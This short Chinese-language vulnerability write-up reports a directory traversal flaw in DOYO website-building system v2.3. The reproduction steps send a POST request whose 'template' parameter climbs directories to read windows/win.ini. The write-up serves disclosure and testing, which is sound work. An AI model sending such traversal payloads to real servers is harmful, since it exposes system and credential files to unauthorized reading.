漏洞描述

DOYO通用建站系统存在通用目录遍历漏洞,问题出现在POST请求包里”template”参数存在漏洞 aid=19&record_page=1&template=../../../../../../../../../../windows/win.ini
 
 

影响版本

DOYO通用建站系统_v2.3
 
 

漏洞复现

访问http://localhost/DOYO/index.php?a=record&c=ajax
修改POST请求包为:

aid=19&record_page=1&template=../../../../../../../../../../windows/win.ini

可以访问系统下的win.ini文件。